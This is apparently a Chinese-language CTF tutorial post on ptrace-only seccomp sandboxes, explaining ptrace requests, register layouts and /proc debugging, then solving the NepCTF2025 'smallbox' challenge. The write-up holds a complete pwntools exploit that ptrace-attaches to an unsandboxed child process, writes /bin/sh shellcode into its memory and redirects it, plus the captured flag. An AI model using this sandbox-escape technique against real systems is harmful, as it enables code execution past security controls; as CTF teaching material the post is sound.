从零开始的 Pwn 之旅 - Ptrace 沙箱

前言

这类题目一般只会允许调用 Ptrace 系统调用

1
2
3
4
5
6
7
8
9
~/P/n/smallbox ❯❯❯ seccomp-tools dump ./smallbox                                                                                                                     (.venv)
[+] please input your shellcode:
ls
 line  CODE  JT   JF      K
=================================
 0000: 0x20 0x00 0x00 0x00000000  A = sys_number
 0001: 0x15 0x00 0x01 0x00000065  if (A != ptrace) goto 0003
 0002: 0x06 0x00 0x00 0x7fff0000  return ALLOW
 0003: 0x06 0x00 0x00 0x00000000  return KILL

ptrace 系统调用

ptrace 是 Linux 中的一个系统调用,可以让父进程控制子进程运行,并可以检查和改变子进程的内存和寄存器状态。它通常用于调试器和沙箱环境中。

其基本原理是:

  • 当使用了 ptrace 跟踪后,所有发送给被跟踪的子进程的信号(除了SIGKILL),都会被转发给父进程
  • 子进程会被阻塞,这时子进程的状态就会被系统标注为 TASK_TRACED
  • 父进程收到信号后,就可以对停止下来的子进程进行检查和修改,然后让子进程继续运行

gdb 就是使用 ptrace 实现的调试器
一个进程只能同时被一个 ptrace 跟踪
linux 默认安全机制只允许父进程 ptract attach 它自己的子进程

定义:

1
2
#include <sys/ptrace.h>
long ptrace(enum __ptrace_request request, pid_t pid, void *addr, void *data);
  • request: 指定请求的类型

      1
      2
      3
      4
      5
      6
      7
      8
      9
     10
     11
     12
     13
     14
     15
     16
     17
     18
     19
     20
     21
     22
     23
     24
     25
     26
     27
     28
     29
     30
     31
     32
     33
     34
     35
     36
     37
     38
     39
     40
     41
     42
     43
     44
     45
     46
     47
     48
     49
     50
     51
     52
     53
     54
     55
     56
     57
     58
     59
     60
     61
     62
     63
     64
     65
     66
     67
     68
     69
     70
     71
     72
     73
     74
     75
     76
     77
     78
     79
     80
     81
     82
     83
     84
     85
     86
     87
     88
     89
     90
     91
     92
     93
     94
     95
     96
     97
     98
     99
    100
    101
    102
    103
    104
    105
    106
    107
    108
    109
    110
    111
    112
    113
    114
    115
    116
    117
    118
    119
    120
    121
    122
    123
    124
    125
    126
    127
    128
    129
    130
    131
    132
    133
    134
    135
    136
    137
    138
    139
    140
    141
    142
    143
    144
    145
    146
    147
    148
    149
    150
    151
    152
    153
    154
    155
    156
    157
    158
    159
    160
    161
    162
    163
    164
    165
    166
    167
    168
    169
    170
    171
    172
    173
    174
    175
    176
    177
    178
    179
    180
    181
    182
    
    /* Type of the REQUEST argument to `ptrace.'  */
    enum __ptrace_request
    {
      /* Indicate that the process making this request should be traced.
         All signals received by this process can be intercepted by its
         parent, and its parent can use the other `ptrace' requests.  */
      PTRACE_TRACEME = 0,
    #define PT_TRACE_ME PTRACE_TRACEME
    
      /* Return the word in the process's text space at address ADDR.  */
      PTRACE_PEEKTEXT = 1,
    #define PT_READ_I PTRACE_PEEKTEXT
    
      /* Return the word in the process's data space at address ADDR.  */
      PTRACE_PEEKDATA = 2,
    #define PT_READ_D PTRACE_PEEKDATA
    
      /* Return the word in the process's user area at offset ADDR.  */
      PTRACE_PEEKUSER = 3,
    #define PT_READ_U PTRACE_PEEKUSER
    
      /* Write the word DATA into the process's text space at address ADDR.  */
      PTRACE_POKETEXT = 4,
    #define PT_WRITE_I PTRACE_POKETEXT
    
      /* Write the word DATA into the process's data space at address ADDR.  */
      PTRACE_POKEDATA = 5,
    #define PT_WRITE_D PTRACE_POKEDATA
    
      /* Write the word DATA into the process's user area at offset ADDR.  */
      PTRACE_POKEUSER = 6,
    #define PT_WRITE_U PTRACE_POKEUSER
    
      /* Continue the process.  */
      PTRACE_CONT = 7,
    #define PT_CONTINUE PTRACE_CONT
    
      /* Kill the process.  */
      PTRACE_KILL = 8,
    #define PT_KILL PTRACE_KILL
    
      /* Single step the process.  */
      PTRACE_SINGLESTEP = 9,
    #define PT_STEP PTRACE_SINGLESTEP
    
      /* Get all general purpose registers used by a processes.  */
      PTRACE_GETREGS = 12,
    #define PT_GETREGS PTRACE_GETREGS
    
      /* Set all general purpose registers used by a processes.  */
      PTRACE_SETREGS = 13,
    #define PT_SETREGS PTRACE_SETREGS
    
      /* Get all floating point registers used by a processes.  */
      PTRACE_GETFPREGS = 14,
    #define PT_GETFPREGS PTRACE_GETFPREGS
    
      /* Set all floating point registers used by a processes.  */
      PTRACE_SETFPREGS = 15,
    #define PT_SETFPREGS PTRACE_SETFPREGS
    
      /* Attach to a process that is already running. */
      PTRACE_ATTACH = 16,
    #define PT_ATTACH PTRACE_ATTACH
    
      /* Detach from a process attached to with PTRACE_ATTACH.  */
      PTRACE_DETACH = 17,
    #define PT_DETACH PTRACE_DETACH
    
      /* Get all extended floating point registers used by a processes.  */
      PTRACE_GETFPXREGS = 18,
    #define PT_GETFPXREGS PTRACE_GETFPXREGS
    
      /* Set all extended floating point registers used by a processes.  */
      PTRACE_SETFPXREGS = 19,
    #define PT_SETFPXREGS PTRACE_SETFPXREGS
    
      /* Continue and stop at the next entry to or return from syscall.  */
      PTRACE_SYSCALL = 24,
    #define PT_SYSCALL PTRACE_SYSCALL
    
      /* Get a TLS entry in the GDT.  */
      PTRACE_GET_THREAD_AREA = 25,
    #define PT_GET_THREAD_AREA PTRACE_GET_THREAD_AREA
    
      /* Change a TLS entry in the GDT.  */
      PTRACE_SET_THREAD_AREA = 26,
    #define PT_SET_THREAD_AREA PTRACE_SET_THREAD_AREA
    
    #ifdef __x86_64__
      /* Access TLS data.  */
      PTRACE_ARCH_PRCTL = 30,
    # define PT_ARCH_PRCTL PTRACE_ARCH_PRCTL
    #endif
    
      /* Continue and stop at the next syscall, it will not be executed.  */
      PTRACE_SYSEMU = 31,
    #define PT_SYSEMU PTRACE_SYSEMU
    
      /* Single step the process, the next syscall will not be executed.  */
      PTRACE_SYSEMU_SINGLESTEP = 32,
    #define PT_SYSEMU_SINGLESTEP PTRACE_SYSEMU_SINGLESTEP
    
      /* Execute process until next taken branch.  */
      PTRACE_SINGLEBLOCK = 33,
    #define PT_STEPBLOCK PTRACE_SINGLEBLOCK
    
      /* Set ptrace filter options.  */
      PTRACE_SETOPTIONS = 0x4200,
    #define PT_SETOPTIONS PTRACE_SETOPTIONS
    
      /* Get last ptrace message.  */
      PTRACE_GETEVENTMSG = 0x4201,
    #define PT_GETEVENTMSG PTRACE_GETEVENTMSG
    
      /* Get siginfo for process.  */
      PTRACE_GETSIGINFO = 0x4202,
    #define PT_GETSIGINFO PTRACE_GETSIGINFO
    
      /* Set new siginfo for process.  */
      PTRACE_SETSIGINFO = 0x4203,
    #define PT_SETSIGINFO PTRACE_SETSIGINFO
    
      /* Get register content.  */
      PTRACE_GETREGSET = 0x4204,
    #define PTRACE_GETREGSET PTRACE_GETREGSET
    
      /* Set register content.  */
      PTRACE_SETREGSET = 0x4205,
    #define PTRACE_SETREGSET PTRACE_SETREGSET
    
      /* Like PTRACE_ATTACH, but do not force tracee to trap and do not affect
         signal or group stop state.  */
      PTRACE_SEIZE = 0x4206,
    #define PTRACE_SEIZE PTRACE_SEIZE
    
      /* Trap seized tracee.  */
      PTRACE_INTERRUPT = 0x4207,
    #define PTRACE_INTERRUPT PTRACE_INTERRUPT
    
      /* Wait for next group event.  */
      PTRACE_LISTEN = 0x4208,
    #define PTRACE_LISTEN PTRACE_LISTEN
    
      /* Retrieve siginfo_t structures without removing signals from a queue.  */
      PTRACE_PEEKSIGINFO = 0x4209,
    #define PTRACE_PEEKSIGINFO PTRACE_PEEKSIGINFO
    
      /* Get the mask of blocked signals.  */
      PTRACE_GETSIGMASK = 0x420a,
    #define PTRACE_GETSIGMASK PTRACE_GETSIGMASK
    
      /* Change the mask of blocked signals.  */
      PTRACE_SETSIGMASK = 0x420b,
    #define PTRACE_SETSIGMASK PTRACE_SETSIGMASK
    
      /* Get seccomp BPF filters.  */
      PTRACE_SECCOMP_GET_FILTER = 0x420c,
    #define PTRACE_SECCOMP_GET_FILTER PTRACE_SECCOMP_GET_FILTER
    
      /* Get seccomp BPF filter metadata.  */
      PTRACE_SECCOMP_GET_METADATA = 0x420d,
    #define PTRACE_SECCOMP_GET_METADATA PTRACE_SECCOMP_GET_METADATA
    
      /* Get information about system call.  */
      PTRACE_GET_SYSCALL_INFO = 0x420e,
    #define PTRACE_GET_SYSCALL_INFO PTRACE_GET_SYSCALL_INFO
    
      /* Get rseq configuration information.  */
      PTRACE_GET_RSEQ_CONFIGURATION = 0x420f,
    #define PTRACE_GET_RSEQ_CONFIGURATION PTRACE_GET_RSEQ_CONFIGURATION
    
      /* Set configuration for syscall user dispatch.  */
      PTRACE_SET_SYSCALL_USER_DISPATCH_CONFIG = 0x4210,
    #define PTRACE_SET_SYSCALL_USER_DISPATCH_CONFIG \
      PTRACE_SET_SYSCALL_USER_DISPATCH_CONFIG
    
      /* Get configuration for syscall user dispatch.  */
      PTRACE_GET_SYSCALL_USER_DISPATCH_CONFIG = 0x4211
    #define PTRACE_GET_SYSCALL_USER_DISPATCH_CONFIG \
      PTRACE_GET_SYSCALL_USER_DISPATCH_CONFIG
    };
  • pid: 被跟踪的进程的 PID

  • addr: 访问的内存地址或寄存器

  • data: 传递的数据

常用示例:

 1
 2
 3
 4
 5
 6
 7
 8
 9
10
11
ptrace(PTRACE_TRACEME, 0, NULL, NULL); // 让当前进程可以被跟踪
ptrace(PTRACE_PEEKTEXT, pid, (void *)0xDEADC0DE000LL, NULL); // 读取子进程的内存
ptrace(PTRACE_POKEDATA, pid, (void *)0xDEADC0DE000LL, shellcode); // 写入 shellcode 到子进程的内存
ptrace(PTRACE_CONT, pid, NULL, NULL); // 继续执行子进程
ptrace(PTRACE_KILL, pid, NULL, NULL); // 终止子进程
ptrace(PTRACE_GETREGS, pid, NULL, &regs); // 获取子进程的寄存器状态
ptrace(PTRACE_SETREGS, pid, NULL, &regs); // 设置子进程的寄存器状态
ptrace(PTRACE_SYSCALL, pid, NULL, NULL); // 让子进程在下一个系统调用处停止
ptrace(PTRACE_SINGLESTEP, pid, NULL, NULL); // 单步执行子进程
ptrace(PTRACE_ATTACH, pid, NULL, NULL); // 附加到一个正在运行的进程
ptrace(PTRACE_DETACH, pid, NULL, NULL); // 从一个附加的进程分离

&regs 是一个结构体,包含了子进程的寄存器状态

amd64:

 1
 2
 3
 4
 5
 6
 7
 8
 9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
struct user_regs_struct {
    unsigned long r15;        // +0x00
    unsigned long r14;        // +0x08
    unsigned long r13;        // +0x10
    unsigned long r12;        // +0x18
    unsigned long rbp;        // +0x20
    unsigned long rbx;        // +0x28
    unsigned long r11;        // +0x30
    unsigned long r10;        // +0x38
    unsigned long r9;         // +0x40
    unsigned long r8;         // +0x48
    unsigned long rax;        // +0x50
    unsigned long rcx;        // +0x58
    unsigned long rdx;        // +0x60
    unsigned long rsi;        // +0x68
    unsigned long rdi;        // +0x70
    unsigned long orig_rax;   // +0x78
    unsigned long rip;        // +0x80
    unsigned long cs;         // +0x88
    unsigned long eflags;     // +0x90
    unsigned long rsp;        // +0x98
    unsigned long ss;         // +0xa0
    unsigned long fs_base;    // +0xa8
    unsigned long gs_base;    // +0xb0
    unsigned long ds;         // +0xb8
    unsigned long es;         // +0xc0
    unsigned long fs;         // +0xc8
    unsigned long gs;         // +0xd0
};

x86:

 1
 2
 3
 4
 5
 6
 7
 8
 9
10
11
12
13
14
15
16
17
18
19
struct user_regs_struct {
    long ebx;         // +0x00
    long ecx;         // +0x04
    long edx;         // +0x08
    long esi;         // +0x0c
    long edi;         // +0x10
    long ebp;         // +0x14
    long eax;         // +0x18
    long xds;         // +0x1c
    long xes;         // +0x20
    long xfs;         // +0x24
    long xgs;         // +0x28
    long orig_eax;    // +0x2c
    long eip;         // +0x30
    long xcs;         // +0x34
    long eflags;      // +0x38
    long esp;         // +0x3c
    long xss;         // +0x40
};

fork 函数

fork 函数用于创建一个新的进程,新的进程是当前进程的副本
它会继承复制父进程的虚拟内存映射结构
也就是说 fork 创建的子进程的 vmmap 是与父进程相同的 fork 函数和父进程是共用文件描述符的,其他是复制在独立的内存空间

 1
 2
 3
 4
 5
 6
 7
 8
 9
10
pid = fork();
if ( pid < 0 )
{
  perror("fork");
  exit(1);
}
if ( !pid )
{
  while ( 1 );
}

创建子进程后,子进程会一直执行 while (1); 挂起

特殊的调试手段

当程序被 ptrace 跟踪时, 我们无法使用 gdb 等调试器进行调试

1
2
3
~ ❯❯❯ ps -aux | grep 64512
lhon901    64512 58.0  0.0   2424  1280 pts/3    t+   20:33   3:28 ./smallbox
lhon901    65401  0.0  0.0   9828  6388 pts/5    S+   20:39   0:00 grep --color=auto 64512

t+ 参数表示该进程被跟踪

linux 一切皆文件, 我们可以直接通过 /proc//maps 读取进程的相关信息

1
2
3
/u/i/sys ❯❯❯ cat /proc/64512/maps # 查看进程的虚拟内存映射

/u/i/sys ❯❯❯ sudo dd if=/proc/64512/mem bs=1 skip=$((0xdeadc0de200)) count=64 2>/dev/null | hexdump -C # 查看某段内存的内容

如果程序被 ptrace 追踪了但是还没有取消追踪时, 可以直接 kill 父进程,此时子进程会直接停止

ptrace attach 之后程序会收到 SIGSTOP 信号, 这时子进程会被阻塞, 直到父进程取消追踪

直接使用 gdb -p <pid> 可以看到停止时的程序切片

例题

NepCtf2025 smallbox

1
2
3
4
5
6
7
8
9
~/P/n/smallbox ❯❯❯ seccomp-tools dump ./smallbox                                                                                                                     (.venv)
[+] please input your shellcode:
ls
 line  CODE  JT   JF      K
=================================
 0000: 0x20 0x00 0x00 0x00000000  A = sys_number
 0001: 0x15 0x00 0x01 0x00000065  if (A != ptrace) goto 0003
 0002: 0x06 0x00 0x00 0x7fff0000  return ALLOW
 0003: 0x06 0x00 0x00 0x00000000  return KILL
 1
 2
 3
 4
 5
 6
 7
 8
 9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
int __fastcall main(int argc, const char **argv, const char **envp)
{
  pid_t pid; // [rsp+4h] [rbp-Ch]

  setbuf(stdin, 0);
  setbuf(stdout, 0);
  setbuf(stderr, 0);
  if ( mmap((void *)0xDEADC0DE000LL, 0x1000u, 7, 50, -1, 0) == (void *)0xDEADC0DE000LL )
  {
    puts("[+] please input your shellcode: ");
    pid = fork();
    if ( pid < 0 )
    {
      perror("fork");
      exit(1);
    }
    if ( !pid )
    {
      while ( 1 )
        ;
    }
    read(0, (void *)0xDEADC0DE000LL, 0x1000u);
    install_seccomp();
    MEMORY[0xDEADC0DE000]();
    return 0;
  }
  else
  {
    perror("mmap");
    return 1;
  }
}

程序首先 mmap 了一段可读可写可执行的区域
使用 fork 函数创建了子进程,子进程永远挂起执行 while (1);
读取我们的输入到 mmap 区域
装载沙箱
执行 mmap 区域的 shellcode


可以注意到的是, fork 出来的子进程是没有沙箱的,所以我们可以通过 ptrace 改写子进程的内存和 RIP 寄存器
从而达到执行 shellcode 的目的

paylaod:

 1
 2
 3
 4
 5
 6
 7
 8
 9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
96
97
98
99
from pwn import *

# p = process("./smallbox")
p = remote("nepctf32-hjwc-ywqj-phqe-67dnypvso470.nepctf.com", 443, ssl=True)
context.terminal = ["kitty", "@", "launch", "--type=window"]
context.arch = "amd64"

mmap_addr = 0xDEADC0DE000

# 1. PTRACE_ATTACH
sc = """
mov rax, 101
mov rdi, 16
mov esi, DWORD ptr [rbp-0xc]
mov rdx, 0
mov r10, 0
syscall
"""

# shellcode = asm(shellcraft.sh())
# https://www.exploit-db.com/exploits/36858
shellcode = b"\x31\xf6\x48\xbb\x2f\x62\x69\x6e\x2f\x2f\x73\x68\x56\x53\x54\x5f\x6a\x3b\x58\x31\xd2\x0f\x05"

# 2. PTRACE_POKEDATA
# Pokedata: 分块写入
for i in range(0, len(shellcode), 8):
    chunk = shellcode[i : i + 8]
    chunk += b"\x00" * (8 - len(chunk))
    chunk_val = int.from_bytes(chunk, "little")
    addr = mmap_addr + 0x200 + i
    sc += f"""
    mov rcx, 1000000000
delay_loop_{i}:
    dec rcx
    jnz delay_loop_{i}
    mov rax, 101
    mov rdi, 5
    mov esi, DWORD PTR [rbp-0xc]
    mov rdx, {addr}
    mov r10, {chunk_val}
    syscall
    """


# 3. PTRACE_GETREGS
# sc += f"""
# mov rax, 101
# mov rdi, 12
# mov esi, DWORD ptr [rbp-0xc]
# mov rdx, 0
# mov r10, {mmap_addr + 0x200}
# syscall
# """

# 4. PTRACE_SETREGS
# 4.1 修改 regs.rip/rsp/rbp
# 4.2 读取 regs_addr 对应偏移,修改 rip/rsp/rbp
# 4.3 通常 rip偏移为 128,rsp为152,rbp为160(x86_64)
sc += f"""
mov rax, 101
mov rdi, 13
mov esi, DWORD PTR [rbp-0xc]
mov rdx, 0
mov r10, {mmap_addr + 0x600}
syscall
"""

# 5. PTRACE_CONT
# sc += """
# mov rax, 101
# mov rdi, 7
# mov esi, DWORD PTR [rbp-0xc]
# mov rdx, 0
# mov r10, 0
# syscall
# """

sc += """
mov rax, 101
mov rdi, 17
mov esi, DWORD PTR [rbp-0xc]
xor rdx, rdx
xor r10, r10
syscall
"""

sc += "jmp $"

assert len(asm(sc)) < 0x200, f"Shellcode too large! ({len(asm(sc))} bytes)"

sc = asm(sc).ljust(0x600 + 128, b"\x00") + p64(mmap_addr + 0x200)  # fake rdi
# gdb.attach(p)
# pause()
p.recvuntil(b"please input your shellcode:")
p.send(sc)

p.interactive()

# flag: NepCTF2025{c16e9c91-e15d-2f25-267a-ae6a5f9f3dc1}

PTRACE_POKEDATA 写入数据时不能连续写入,需要加入延迟
因为不能使用 sleep 等调用, 我们使用了一个简单的循环来实现延迟

1
2
3
4
mov rcx, 1000000000
delay_loop_{i}:
    dec rcx
    jnz delay_loop_{i}

Github Copilot:

1
2
3
4
内核调度与信号竞争
    ptrace 本质是进程间的“调试协议”,每次 POKEDATA 都会产生进程状态切换(如目标进程被 STOP,写入后再 CONT)。
    如果 tracer 进程连续高速写入,目标进程来不及响应和切换状态,导致写入操作覆盖或丢失。
    某些场景下,目标进程可能还在运行其它代码导致写入区被修改或复用。

程序最后要加入 jmp $,否则主线程会在执行完 shellcode 后退出,导致子进程后续无法正确的 getshell